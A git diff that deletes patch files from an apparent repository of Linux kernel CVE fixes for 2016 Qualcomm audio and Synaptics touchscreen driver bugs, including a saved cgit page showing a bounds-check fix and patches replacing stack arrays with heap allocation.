-<option value='linaro/v3.10/topic/old-mailbox-2'>linaro/v3.10/topic/old-mailbox-2</option>
-<option value='linaro/v3.10/topic/pe-wq'>linaro/v3.10/topic/pe-wq</option>
-<option value='linaro/v3.10/topic/pinctrl'>linaro/v3.10/topic/pinctrl</option>
-<option value='linaro/v3.10/topic/ptr-err'>linaro/v3.10/topic/ptr-err</option>
-<option value='linaro/v3.10/topic/ptrace'>linaro/v3.10/topic/ptrace</option>
-<option value='linaro/v3.10/topic/tagged-pointers'>linaro/v3.10/topic/tagged-pointers</option>
-<option value='linaro/v3.10/topic/tc2'>linaro/v3.10/topic/tc2</option>
-<option value='linaro/v3.10/topic/thermal-framework'>linaro/v3.10/topic/thermal-framework</option>
-<option value='linaro/v3.10/topic/thp'>linaro/v3.10/topic/thp</option>
-<option value='linaro/v3.10/topic/topology'>linaro/v3.10/topic/topology</option>
-<option value='linaro/v3.10/topic/usb'>linaro/v3.10/topic/usb</option>
-<option value='linaro/v3.10/topic/warnings'>linaro/v3.10/topic/warnings</option>
-<option value='linaro/v3.10/topic/zram'>linaro/v3.10/topic/zram</option>
-<option value='linaro/v3.14/old/mailbox'>linaro/v3.14/old/mailbox</option>
-<option value='linaro/v3.14/topic/aosp'>linaro/v3.14/topic/aosp</option>
-<option value='linaro/v3.14/topic/arm64-apm'>linaro/v3.14/topic/arm64-apm</option>
-<option value='linaro/v3.14/topic/arm64-be'>linaro/v3.14/topic/arm64-be</option>
-<option value='linaro/v3.14/topic/arm64-bl-cpufreq'>linaro/v3.14/topic/arm64-bl-cpufreq</option>
-<option value='linaro/v3.14/topic/arm64-cma'>linaro/v3.14/topic/arm64-cma</option>
-<option value='linaro/v3.14/topic/arm64-cmadma'>linaro/v3.14/topic/arm64-cmadma</option>
-<option value='linaro/v3.14/topic/arm64-crypto'>linaro/v3.14/topic/arm64-crypto</option>
-<option value='linaro/v3.14/topic/arm64-dts'>linaro/v3.14/topic/arm64-dts</option>
-<option value='linaro/v3.14/topic/arm64-efi'>linaro/v3.14/topic/arm64-efi</option>
-<option value='linaro/v3.14/topic/arm64-errata'>linaro/v3.14/topic/arm64-errata</option>
-<option value='linaro/v3.14/topic/arm64-fpsimd'>linaro/v3.14/topic/arm64-fpsimd</option>
-<option value='linaro/v3.14/topic/arm64-ftrace'>linaro/v3.14/topic/arm64-ftrace</option>
-<option value='linaro/v3.14/topic/arm64-fvp'>linaro/v3.14/topic/arm64-fvp</option>
-<option value='linaro/v3.14/topic/arm64-hugepages'>linaro/v3.14/topic/arm64-hugepages</option>
-<option value='linaro/v3.14/topic/arm64-kgdb'>linaro/v3.14/topic/arm64-kgdb</option>
-<option value='linaro/v3.14/topic/arm64-lts'>linaro/v3.14/topic/arm64-lts</option>
-<option value='linaro/v3.14/topic/arm64-misc'>linaro/v3.14/topic/arm64-misc</option>
-<option value='linaro/v3.14/topic/arm64-perf'>linaro/v3.14/topic/arm64-perf</option>
-<option value='linaro/v3.14/topic/arm64-ptrace'>linaro/v3.14/topic/arm64-ptrace</option>
-<option value='linaro/v3.14/topic/arm64-topology'>linaro/v3.14/topic/arm64-topology</option>
-<option value='linaro/v3.14/topic/arm64-usb'>linaro/v3.14/topic/arm64-usb</option>
-<option value='linaro/v3.14/topic/clk-divider'>linaro/v3.14/topic/clk-divider</option>
-<option value='linaro/v3.14/topic/configs'>linaro/v3.14/topic/configs</option>
-<option value='linaro/v3.14/topic/coresight'>linaro/v3.14/topic/coresight</option>
-<option value='linaro/v3.14/topic/dm-crypt'>linaro/v3.14/topic/dm-crypt</option>
-<option value='linaro/v3.14/topic/dwc3'>linaro/v3.14/topic/dwc3</option>
-<option value='linaro/v3.14/topic/earlycon'>linaro/v3.14/topic/earlycon</option>
-<option value='linaro/v3.14/topic/efi'>linaro/v3.14/topic/efi</option>
-<option value='linaro/v3.14/topic/gator'>linaro/v3.14/topic/gator</option>
-<option value='linaro/v3.14/topic/gcov'>linaro/v3.14/topic/gcov</option>
-<option value='linaro/v3.14/topic/gendpd'>linaro/v3.14/topic/gendpd</option>
-<option value='linaro/v3.14/topic/genpd'>linaro/v3.14/topic/genpd</option>
-<option value='linaro/v3.14/topic/gicv3'>linaro/v3.14/topic/gicv3</option>
-<option value='linaro/v3.14/topic/juno'>linaro/v3.14/topic/juno</option>
-<option value='linaro/v3.14/topic/kvm'>linaro/v3.14/topic/kvm</option>
-<option value='linaro/v3.14/topic/libfdt'>linaro/v3.14/topic/libfdt</option>
-<option value='linaro/v3.14/topic/mailbox'>linaro/v3.14/topic/mailbox</option>
-<option value='linaro/v3.14/topic/misc'>linaro/v3.14/topic/misc</option>
-<option value='linaro/v3.14/topic/nohz'>linaro/v3.14/topic/nohz</option>
-<option value='linaro/v3.14/topic/of'>linaro/v3.14/topic/of</option>
-<option value='linaro/v3.14/topic/old-mailbox-2'>linaro/v3.14/topic/old-mailbox-2</option>
-<option value='linaro/v3.14/topic/overlayfs'>linaro/v3.14/topic/overlayfs</option>
-<option value='linaro/v3.14/topic/usb'>linaro/v3.14/topic/usb</option>
-<option value='linaro/v3.14/topic/vexpress'>linaro/v3.14/topic/vexpress</option>
-<option value='linaro/v3.18/topic/EAS'>linaro/v3.18/topic/EAS</option>
-<option value='linaro/v3.18/topic/EAS-LSK'>linaro/v3.18/topic/EAS-LSK</option>
-<option value='linaro/v3.18/topic/GICv2m'>linaro/v3.18/topic/GICv2m</option>
-<option value='linaro/v3.18/topic/KASAN'>linaro/v3.18/topic/KASAN</option>
-<option value='linaro/v3.18/topic/OPPv2'>linaro/v3.18/topic/OPPv2</option>
-<option value='linaro/v3.18/topic/PAN'>linaro/v3.18/topic/PAN</option>
-<option value='linaro/v3.18/topic/android/aosp'>linaro/v3.18/topic/android/aosp</option>
-<option value='linaro/v3.18/topic/android/aosp-fixes'>linaro/v3.18/topic/android/aosp-fixes</option>
-<option value='linaro/v3.18/topic/aosp'>linaro/v3.18/topic/aosp</option>
-<option value='linaro/v3.18/topic/aosp-fixes'>linaro/v3.18/topic/aosp-fixes</option>
-<option value='linaro/v3.18/topic/arm64/dt'>linaro/v3.18/topic/arm64/dt</option>
-<option value='linaro/v3.18/topic/arm64/dt-juno'>linaro/v3.18/topic/arm64/dt-juno</option>
-<option value='linaro/v3.18/topic/configs'>linaro/v3.18/topic/configs</option>
-<option value='linaro/v3.18/topic/coresight'>linaro/v3.18/topic/coresight</option>
-<option value='linaro/v3.18/topic/dm-crypt'>linaro/v3.18/topic/dm-crypt</option>
-<option value='linaro/v3.18/topic/dt-overlay'>linaro/v3.18/topic/dt-overlay</option>
-<option value='linaro/v3.18/topic/fixes'>linaro/v3.18/topic/fixes</option>
-<option value='linaro/v3.18/topic/for-stable'>linaro/v3.18/topic/for-stable</option>
-<option value='linaro/v3.18/topic/iommu'>linaro/v3.18/topic/iommu</option>
-<option value='linaro/v3.18/topic/mm-kaslr'>linaro/v3.18/topic/mm-kaslr</option>
-<option value='linaro/v3.18/topic/msi-irqdomain'>linaro/v3.18/topic/msi-irqdomain</option>
-<option value='linaro/v3.18/topic/of'>linaro/v3.18/topic/of</option>
-<option value='linaro/v3.18/topic/of-overlay'>linaro/v3.18/topic/of-overlay</option>
-<option value='linaro/v3.18/topic/optee'>linaro/v3.18/topic/optee</option>
-<option value='linaro/v3.18/topic/pcie-temp'>linaro/v3.18/topic/pcie-temp</option>
-<option value='linaro/v3.18/topic/pcie/gic'>linaro/v3.18/topic/pcie/gic</option>
-<option value='linaro/v3.18/topic/pcie/gic-msi-irqdomain'>linaro/v3.18/topic/pcie/gic-msi-irqdomain</option>
-<option value='linaro/v3.18/topic/pcie/imx-fix'>linaro/v3.18/topic/pcie/imx-fix</option>
-<option value='linaro/v3.18/topic/pcie/master'>linaro/v3.18/topic/pcie/master</option>
-<option value='linaro/v3.18/topic/pcie/msi-irqdomain'>linaro/v3.18/topic/pcie/msi-irqdomain</option>
-<option value='linaro/v3.18/topic/pcie/mustang-fix-tmp'>linaro/v3.18/topic/pcie/mustang-fix-tmp</option>
-<option value='linaro/v3.18/topic/pcie/of-iommu'>linaro/v3.18/topic/pcie/of-iommu</option>
-<option value='linaro/v3.18/topic/thermal'>linaro/v3.18/topic/thermal</option>
-<option value='linaro/v3.18/topic/thermal-deps'>linaro/v3.18/topic/thermal-deps</option>
-<option value='linaro/v3.9/android-fixes'>linaro/v3.9/android-fixes</option>
-<option value='linaro/v3.9/big-little-arm'>linaro/v3.9/big-little-arm</option>
-<option value='linaro/v3.9/configs'>linaro/v3.9/configs</option>
-<option value='linaro/v3.9/iks'>linaro/v3.9/iks</option>
-<option value='linaro/v3.9/linaro-builddeb-tweaks'>linaro/v3.9/linaro-builddeb-tweaks</option>
-<option value='linaro/v3.9/vexpress'>linaro/v3.9/vexpress</option>
-<option value='linaro/v3.9/ynk-fixes'>linaro/v3.9/ynk-fixes</option>
-<option value='linaro/v4.1/topic/IOMMU-DMA'>linaro/v4.1/topic/IOMMU-DMA</option>
-<option value='linaro/v4.1/topic/KASAN'>linaro/v4.1/topic/KASAN</option>
-<option value='linaro/v4.1/topic/OPPv2'>linaro/v4.1/topic/OPPv2</option>
-<option value='linaro/v4.1/topic/PAN'>linaro/v4.1/topic/PAN</option>
-<option value='linaro/v4.1/topic/PSCI'>linaro/v4.1/topic/PSCI</option>
-<option value='linaro/v4.1/topic/configs'>linaro/v4.1/topic/configs</option>
-<option value='linaro/v4.1/topic/devfreq-cooling'>linaro/v4.1/topic/devfreq-cooling</option>
-<option value='linaro/v4.1/topic/hibernate'>linaro/v4.1/topic/hibernate</option>
-<option value='linaro/v4.1/topic/iommu-dma'>linaro/v4.1/topic/iommu-dma</option>
-<option value='linaro/v4.1/topic/pcie-junor1'>linaro/v4.1/topic/pcie-junor1</option>
-<option value='linaro/v4.1/topic/pcie-junor1-temp'>linaro/v4.1/topic/pcie-junor1-temp</option>
-<option value='linaro/v4.1/topic/perf'>linaro/v4.1/topic/perf</option>
-<option value='linaro/v4.1/topic/ro-vDSO'>linaro/v4.1/topic/ro-vDSO</option>
-<option value='linaro/v4.1/topic/rt'>linaro/v4.1/topic/rt</option>
-<option value='linaro/v4.1/topic/thermal'>linaro/v4.1/topic/thermal</option>
-<option value='linaro/v4.1/topic/writeback-cg'>linaro/v4.1/topic/writeback-cg</option>
-<option value='linaro/v4.4/topic/OPPv2'>linaro/v4.4/topic/OPPv2</option>
-<option value='linaro/v4.4/topic/coresight'>linaro/v4.4/topic/coresight</option>
-<option value='linaro/v4.4/topic/hibernate'>linaro/v4.4/topic/hibernate</option>
-<option value='linaro/v4.4/topic/hibernate-temp'>linaro/v4.4/topic/hibernate-temp</option>
-<option value='linaro/v4.4/topic/kexec-kdump'>linaro/v4.4/topic/kexec-kdump</option>
-<option value='linaro/v4.4/topic/kprobes64'>linaro/v4.4/topic/kprobes64</option>
-<option value='linaro/v4.4/topic/mm-kaslr'>linaro/v4.4/topic/mm-kaslr</option>
-<option value='linaro/v4.4/topic/mm-kaslr-pax_usercopy'>linaro/v4.4/topic/mm-kaslr-pax_usercopy</option>
-<option value='linaro/v4.4/topic/optee'>linaro/v4.4/topic/optee</option>
-<option value='linaro/v4.4/topic/optee-lsk-mainline'>linaro/v4.4/topic/optee-lsk-mainline</option>
-<option value='linaro/v4.4/topic/perf-opencsd-4.4-github'>linaro/v4.4/topic/perf-opencsd-4.4-github</option>
-<option value='linaro/v4.4/topic/ro-vdso'>linaro/v4.4/topic/ro-vdso</option>
-<option value='linaro/v4.4/topic/wb-cg2'>linaro/v4.4/topic/wb-cg2</option>
-<option value='linaro/v4.9/topic/OPTEE'>linaro/v4.9/topic/OPTEE</option>
-<option value='linaro/v4.9/topic/PANemulation'>linaro/v4.9/topic/PANemulation</option>
-<option value='linaro/v4.9/topic/ion'>linaro/v4.9/topic/ion</option>
-<option value='linaro/v4.9/topic/kexec-kdump'>linaro/v4.9/topic/kexec-kdump</option>
-<option value='linaro/v4.9/topic/optee'>linaro/v4.9/topic/optee</option>
-<option value='linaro/v4.9/topic/optee-lsk-mainline'>linaro/v4.9/topic/optee-lsk-mainline</option>
-<option value='msm-3.18'>msm-3.18</option>
-<option value='pixart-sensor-db810-linux-driver/PIXART_OTS'>pixart-sensor-db810-linux-driver/PIXART_OTS</option>
-<option value='rel/msm-3.18'>rel/msm-3.18</option>
-<option value='rel/msm-3.18.c2'>rel/msm-3.18.c2</option>
-<option value='rel/msm-3.18.c5'>rel/msm-3.18.c5</option>
-<option value='rel/msm-3.18.c7'>rel/msm-3.18.c7</option>
-<option value='rel/msm-3.18.c8'>rel/msm-3.18.c8</option>
-<option value='rel/msm-3.18.c9'>rel/msm-3.18.c9</option>
-<option value='rel/msm-3.18.r17'>rel/msm-3.18.r17</option>
-<option value='rel/msm-3.18.r18'>rel/msm-3.18.r18</option>
-<option value='rel/msm-3.18.r5'>rel/msm-3.18.r5</option>
-</select> <input type='submit' value='switch'/></form></td></tr>
-<tr><td class='sub'>Unnamed repository</td><td class='sub right'>Git</td></tr></table>
-<table class='tabs'><tr><td>
-<a href='/quic/la/kernel/msm-3.18/?h=LA.HB.0.3'>summary</a><a href='/quic/la/kernel/msm-3.18/refs/?h=LA.HB.0.3&amp;id=528976f54be246ec93a71ac53aa4faf3e3791c48'>refs</a><a href='/quic/la/kernel/msm-3.18/log/sound/soc/msm/qdsp6v2/audio_calibration.c?h=LA.HB.0.3'>log</a><a href='/quic/la/kernel/msm-3.18/tree/sound/soc/msm/qdsp6v2/audio_calibration.c?h=LA.HB.0.3&amp;id=528976f54be246ec93a71ac53aa4faf3e3791c48'>tree</a><a href='/quic/la/kernel/msm-3.18/commit/sound/soc/msm/qdsp6v2/audio_calibration.c?h=LA.HB.0.3&amp;id=528976f54be246ec93a71ac53aa4faf3e3791c48'>commit</a><a class='active' href='/quic/la/kernel/msm-3.18/diff/sound/soc/msm/qdsp6v2/audio_calibration.c?h=LA.HB.0.3&amp;id=528976f54be246ec93a71ac53aa4faf3e3791c48'>diff</a><a href='/quic/la/kernel/msm-3.18/stats/sound/soc/msm/qdsp6v2/audio_calibration.c?h=LA.HB.0.3'>stats</a></td><td class='form'><form class='right' method='get' action='/quic/la/kernel/msm-3.18/log/sound/soc/msm/qdsp6v2/audio_calibration.c'>
-<input type='hidden' name='h' value='LA.HB.0.3'/><input type='hidden' name='id' value='528976f54be246ec93a71ac53aa4faf3e3791c48'/><select name='qt'>
-<option value='grep'>log msg</option>
-<option value='author'>author</option>
-<option value='committer'>committer</option>
-<option value='range'>range</option>
-</select>
-<input class='txt' type='text' size='10' name='q' value=''/>
-<input type='submit' value='search'/>
-</form>
-</td></tr></table>
-<div class='path'>path: <a href='/quic/la/kernel/msm-3.18/diff/?h=LA.HB.0.3&amp;id=528976f54be246ec93a71ac53aa4faf3e3791c48'>root</a>/<a href='/quic/la/kernel/msm-3.18/diff/sound?h=LA.HB.0.3&amp;id=528976f54be246ec93a71ac53aa4faf3e3791c48'>sound</a>/<a href='/quic/la/kernel/msm-3.18/diff/sound/soc?h=LA.HB.0.3&amp;id=528976f54be246ec93a71ac53aa4faf3e3791c48'>soc</a>/<a href='/quic/la/kernel/msm-3.18/diff/sound/soc/msm?h=LA.HB.0.3&amp;id=528976f54be246ec93a71ac53aa4faf3e3791c48'>msm</a>/<a href='/quic/la/kernel/msm-3.18/diff/sound/soc/msm/qdsp6v2?h=LA.HB.0.3&amp;id=528976f54be246ec93a71ac53aa4faf3e3791c48'>qdsp6v2</a>/<a href='/quic/la/kernel/msm-3.18/diff/sound/soc/msm/qdsp6v2/audio_calibration.c?h=LA.HB.0.3&amp;id=528976f54be246ec93a71ac53aa4faf3e3791c48'>audio_calibration.c</a></div><div class='content'><div class='cgit-panel'><b>diff options</b><form method='get'><input type='hidden' name='h' value='LA.HB.0.3'/><input type='hidden' name='id' value='528976f54be246ec93a71ac53aa4faf3e3791c48'/><table><tr><td colspan='2'/></tr><tr><td class='label'>context:</td><td class='ctrl'><select name='context' onchange='this.form.submit();'><option value='1'>1</option><option value='2'>2</option><option value='3' selected='selected'>3</option><option value='4'>4</option><option value='5'>5</option><option value='6'>6</option><option value='7'>7</option><option value='8'>8</option><option value='9'>9</option><option value='10'>10</option><option value='15'>15</option><option value='20'>20</option><option value='25'>25</option><option value='30'>30</option><option value='35'>35</option><option value='40'>40</option></select></td></tr><tr><td class='label'>space:</td><td class='ctrl'><select name='ignorews' onchange='this.form.submit();'><option value='0' selected='selected'>include</option><option value='1'>ignore</option></select></td></tr><tr><td class='label'>mode:</td><td class='ctrl'><select name='dt' onchange='this.form.submit();'><option value='0' selected='selected'>unified</option><option value='1'>ssdiff</option><option value='2'>stat only</option></select></td></tr><tr><td/><td class='ctrl'><noscript><input type='submit' value='reload'/></noscript></td></tr></table></form></div><div class='diffstat-header'><a href='/quic/la/kernel/msm-3.18/diff/?h=LA.HB.0.3&amp;id=528976f54be246ec93a71ac53aa4faf3e3791c48'>Diffstat</a> (limited to 'sound/soc/msm/qdsp6v2/audio_calibration.c')</div><table summary='diffstat' class='diffstat'><tr><td class='mode'>-rw-r--r--</td><td class='upd'><a href='/quic/la/kernel/msm-3.18/diff/sound/soc/msm/qdsp6v2/audio_calibration.c?h=LA.HB.0.3&amp;id=528976f54be246ec93a71ac53aa4faf3e3791c48'>sound/soc/msm/qdsp6v2/audio_calibration.c</a></td><td class='right'>10</td><td class='graph'><table summary='file diffstat' width='10%'><tr><td class='add' style='width: 80.0%;'/><td class='rem' style='width: 20.0%;'/><td class='none' style='width: 0.0%;'/></tr></table></td></tr>
-</table><div class='diffstat-summary'>1 files changed, 8 insertions, 2 deletions</div><table summary='diff' class='diff'><tr><td><div class='head'>diff --git a/sound/soc/msm/qdsp6v2/audio_calibration.c b/sound/soc/msm/qdsp6v2/audio_calibration.c<br/>index c4ea4ed..60d09df 100644<br/>--- a/<a href='/quic/la/kernel/msm-3.18/tree/sound/soc/msm/qdsp6v2/audio_calibration.c?h=LA.HB.0.3&amp;id=3333d3cd218fbfe7e369f269335d38bd76a4741e'>sound/soc/msm/qdsp6v2/audio_calibration.c</a><br/>+++ b/<a href='/quic/la/kernel/msm-3.18/tree/sound/soc/msm/qdsp6v2/audio_calibration.c?h=LA.HB.0.3&amp;id=528976f54be246ec93a71ac53aa4faf3e3791c48'>sound/soc/msm/qdsp6v2/audio_calibration.c</a></div><div class='hunk'>@@ -1,4 +1,4 @@</div><div class='del'>-/* Copyright (c) 2014, The Linux Foundation. All rights reserved.</div><div class='add'>+/* Copyright (c) 2014, 2016 The Linux Foundation. All rights reserved.</div><div class='ctx'>  *</div><div class='ctx'>  * This program is free software; you can redistribute it and/or modify</div><div class='ctx'>  * it under the terms of the GNU General Public License version 2 and</div><div class='hunk'>@@ -490,7 +490,13 @@ static long audio_cal_shared_ioctl(struct file *file, unsigned int cmd,</div><div class='ctx'> 			goto unlock;</div><div class='ctx'> 		if (data == NULL)</div><div class='ctx'> 			goto unlock;</div><div class='del'>-		if (copy_to_user((void *)arg, data,</div><div class='add'>+		if ((sizeof(data-&gt;hdr) + data-&gt;hdr.cal_type_size) &gt; size) {</div><div class='add'>+			pr_err("%s: header size %zd plus cal type size %d are greater than data buffer size %d\n",</div><div class='add'>+				__func__, sizeof(data-&gt;hdr),</div><div class='add'>+				data-&gt;hdr.cal_type_size, size);</div><div class='add'>+			ret = -EFAULT;</div><div class='add'>+			goto unlock;</div><div class='add'>+		} else if (copy_to_user((void *)arg, data,</div><div class='ctx'> 			sizeof(data-&gt;hdr) + data-&gt;hdr.cal_type_size)) {</div><div class='ctx'> 			pr_err("%s: Could not copy cal type to user\n",</div><div class='ctx'> 				__func__);</div></td></tr></table></div> <!-- class=content -->
-    <div id="lfcollabprojects-footer">
-      <div class="gray-diagonal">
-        <div class="footer-inner">
-          <p>&copy; 2016 Code Aurora Forum, a Linux Foundation Collaborative Project. All Rights Reserved.</p>
-          <p>Linux Foundation and Code Aurora Forum are registered trademarks of The Linux Foundation.</p>
-          <p>Linux is a registered <a href="http://www.linuxfoundation.org/programs/legal/trademark" title="Linux Mark Institute">trademark</a> of Linus Torvalds.</p>
-          <p>Please see our <a href="http://www.linuxfoundation.org/privacy">privacy policy</a>, <a href="http://www.linuxfoundation.org/antitrust-policy">antitrust policy</a> and <a href="http://www.linuxfoundation.org/terms">terms of use</a>.</p>
-        </div>
-      </div>
-    </div>
-</div> <!-- id=cgit -->
-</body>
-</html>
diff --git a/Patches/Linux_CVEs/CVE-2016-3865/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3865/ANY/0001.patch
deleted file mode 100644
index 7f461976..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3865/ANY/0001.patch
+++ /dev/null
@@ -1,86 +0,0 @@
-From a92e71c20f4e6b2aa94b7614fd494833ea76b8b9 Mon Sep 17 00:00:00 2001
-From: Biswajit Paul <biswajitpaul@codeaurora.org>
-Date: Thu, 30 Jun 2016 19:00:50 -0700
-Subject: [PATCH] input: synaptics: allocate heap memory for temp buf
-
-rmidev file operations structure include write() and
-read() which accepts data from user space. Temp
-buffers are allocated through variable length arrays
-which can pose security problems. So allocate memory
-on heap instead of stack to avoid this.
-
-Bug: 28799389
-CRs-Fixed: 1032459
-Change-Id: I44443f91d435715dd0097ef8e8dfc48e291f93fc
-Signed-off-by: Mohan Pallaka <mpallaka@codeaurora.org>
-Signed-off-by: Biswajit Paul <biswajitpaul@codeaurora.org>
----
- drivers/input/touchscreen/synaptics_rmi_dev.c | 19 +++++++++++++++----
- 1 file changed, 15 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_rmi_dev.c b/drivers/input/touchscreen/synaptics_rmi_dev.c
-index 88595582579e0..e2d7c27eb6832 100644
---- a/drivers/input/touchscreen/synaptics_rmi_dev.c
-+++ b/drivers/input/touchscreen/synaptics_rmi_dev.c
-@@ -291,7 +291,7 @@ static ssize_t rmidev_read(struct file *filp, char __user *buf,
- 		size_t count, loff_t *f_pos)
- {
- 	ssize_t retval;
--	unsigned char tmpbuf[count + 1];
-+	unsigned char *tmpbuf;
- 	struct rmidev_data *dev_data = filp->private_data;
- 
- 	if (IS_ERR(dev_data)) {
-@@ -305,6 +305,10 @@ static ssize_t rmidev_read(struct file *filp, char __user *buf,
- 	if (count > (REG_ADDR_LIMIT - *f_pos))
- 		count = REG_ADDR_LIMIT - *f_pos;
- 
-+	tmpbuf = kzalloc(count + 1, GFP_KERNEL);
-+	if (!tmpbuf)
-+		return -ENOMEM;
-+
- 	mutex_lock(&(dev_data->file_mutex));
- 
- 	retval = rmidev->fn_ptr->read(rmidev->rmi4_data,
-@@ -322,6 +326,7 @@ static ssize_t rmidev_read(struct file *filp, char __user *buf,
- clean_up:
- 	mutex_unlock(&(dev_data->file_mutex));
- 
-+	kfree(tmpbuf);
- 	return retval;
- }
- 
-@@ -337,7 +342,7 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf,
- 		size_t count, loff_t *f_pos)
- {
- 	ssize_t retval;
--	unsigned char tmpbuf[count + 1];
-+	unsigned char *tmpbuf;
- 	struct rmidev_data *dev_data = filp->private_data;
- 
- 	if (IS_ERR(dev_data)) {
-@@ -351,8 +356,14 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf,
- 	if (count > (REG_ADDR_LIMIT - *f_pos))
- 		count = REG_ADDR_LIMIT - *f_pos;
- 
--	if (copy_from_user(tmpbuf, buf, count))
-+	tmpbuf = kzalloc(count + 1, GFP_KERNEL);
-+	if (!tmpbuf)
-+		return -ENOMEM;
-+
-+	if (copy_from_user(tmpbuf, buf, count)) {
-+		kfree(tmpbuf);
- 		return -EFAULT;
-+	}
- 
- 	mutex_lock(&(dev_data->file_mutex));
- 
-@@ -364,7 +375,7 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf,
- 		*f_pos += retval;
- 
- 	mutex_unlock(&(dev_data->file_mutex));
--
-+	kfree(tmpbuf);
- 	return retval;
- }
- 
diff --git a/Patches/Linux_CVEs/CVE-2016-3865/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-3865/ANY/0002.patch
deleted file mode 100644
index cd0e3117..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3865/ANY/0002.patch
+++ /dev/null
@@ -1,86 +0,0 @@
-From 92242610894d1dc26759e486af1d11f2eb78c922 Mon Sep 17 00:00:00 2001
-From: Biswajit Paul <biswajitpaul@codeaurora.org>
-Date: Thu, 30 Jun 2016 19:00:50 -0700
-Subject: [PATCH] input: synaptics_dsx: allocate heap memory for temp buf
-
-rmidev file operations structure include write() and
-read() which accepts data from user space. Temp
-buffers are allocated through variable length arrays
-which can pose security problems. So allocate memory
-on heap instead of stack to avoid this.
-
-Bug: 28799389
-CRs-Fixed: 1032459
-Change-Id: I44443f91d435715dd0097ef8e8dfc48e291f93fc
-Signed-off-by: Mohan Pallaka <mpallaka@codeaurora.org>
-Signed-off-by: Biswajit Paul <biswajitpaul@codeaurora.org>
----
- .../touchscreen/synaptics_dsx/synaptics_dsx_rmi_dev.c | 19 +++++++++++++++----
- 1 file changed, 15 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx/synaptics_dsx_rmi_dev.c b/drivers/input/touchscreen/synaptics_dsx/synaptics_dsx_rmi_dev.c
-index 4c341ffb60940..bb9ddd9873cb1 100644
---- a/drivers/input/touchscreen/synaptics_dsx/synaptics_dsx_rmi_dev.c
-+++ b/drivers/input/touchscreen/synaptics_dsx/synaptics_dsx_rmi_dev.c
-@@ -347,7 +347,7 @@ static ssize_t rmidev_read(struct file *filp, char __user *buf,
- 		size_t count, loff_t *f_pos)
- {
- 	ssize_t retval;
--	unsigned char tmpbuf[count + 1];
-+	unsigned char *tmpbuf;
- 	struct rmidev_data *dev_data = filp->private_data;
- 
- 	if (IS_ERR(dev_data)) {
-@@ -361,6 +361,10 @@ static ssize_t rmidev_read(struct file *filp, char __user *buf,
- 	if (count > (REG_ADDR_LIMIT - *f_pos))
- 		count = REG_ADDR_LIMIT - *f_pos;
- 
-+	tmpbuf = kzalloc(count + 1, GFP_KERNEL);
-+	if (!tmpbuf)
-+		return -ENOMEM;
-+
- 	mutex_lock(&(dev_data->file_mutex));
- 
- 	retval = synaptics_rmi4_reg_read(rmidev->rmi4_data,
-@@ -378,6 +382,7 @@ static ssize_t rmidev_read(struct file *filp, char __user *buf,
- clean_up:
- 	mutex_unlock(&(dev_data->file_mutex));
- 
-+	kfree(tmpbuf);
- 	return retval;
- }
- 
-@@ -393,7 +398,7 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf,
- 		size_t count, loff_t *f_pos)
- {
- 	ssize_t retval;
--	unsigned char tmpbuf[count + 1];
-+	unsigned char *tmpbuf;
- 	struct rmidev_data *dev_data = filp->private_data;
- 
- 	if (IS_ERR(dev_data)) {
-@@ -407,8 +412,14 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf,
- 	if (count > (REG_ADDR_LIMIT - *f_pos))
- 		count = REG_ADDR_LIMIT - *f_pos;
- 
--	if (copy_from_user(tmpbuf, buf, count))
-+	tmpbuf = kzalloc(count + 1, GFP_KERNEL);
-+	if (!tmpbuf)
-+		return -ENOMEM;
-+
-+	if (copy_from_user(tmpbuf, buf, count)) {
-+		kfree(tmpbuf);
- 		return -EFAULT;
-+	}
- 
- 	mutex_lock(&(dev_data->file_mutex));
- 
-@@ -420,7 +431,7 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf,
- 		*f_pos += retval;
- 
- 	mutex_unlock(&(dev_data->file_mutex));
--
-+	kfree(tmpbuf);
- 	return retval;
- }
- 
diff --git a/Patches/Linux_CVEs/CVE-2016-3866/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3866/ANY/0001.patch
deleted file mode 100644
index cedadb2a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3866/ANY/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From 5180cefe0eeb6f3e6e0c4967652facd20f07c20c Mon Sep 17 00:00:00 2001
-From: Surendar karka <sukark@codeaurora.org>
-Date: Wed, 29 Jun 2016 14:23:25 +0530
-Subject: ASoC: msm: qdsp6v2: check param length for EAC3 format
-
-Initialize param length with user space argument and
-check the condition for maximum length in
-SND_AUDIOCODEC_EAC3 format.
-
-CRs-Fixed: 1032820
-Change-Id: I710c1f743d7502e93989e8cc487078366570e723
-Signed-off-by: Surendar karka <sukark@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-index f577637..26528e6 100644
---- a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-@@ -1070,6 +1070,7 @@ static int msm_compr_ioctl_shared(struct snd_pcm_substream *substream,
- 				__func__, ddp->params_length);
- 				return -EINVAL;
- 			}
-+			params_length = ddp->params_length*sizeof(int);
- 			if (params_length > MAX_AC3_PARAM_SIZE) {
- 				/*MAX is 36*sizeof(int) this should not happen*/
- 				pr_err("%s: params_length(%d) is greater than %zd\n",
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3867/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-3867/3.10/0001.patch
deleted file mode 100644
index 81970697..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3867/3.10/0001.patch
+++ /dev/null
@@ -1,505 +0,0 @@
-From 816da3d19cfee937f5add485a112bb1cdfcb72c8 Mon Sep 17 00:00:00 2001
-From: Skylar Chang <chiaweic@codeaurora.org>
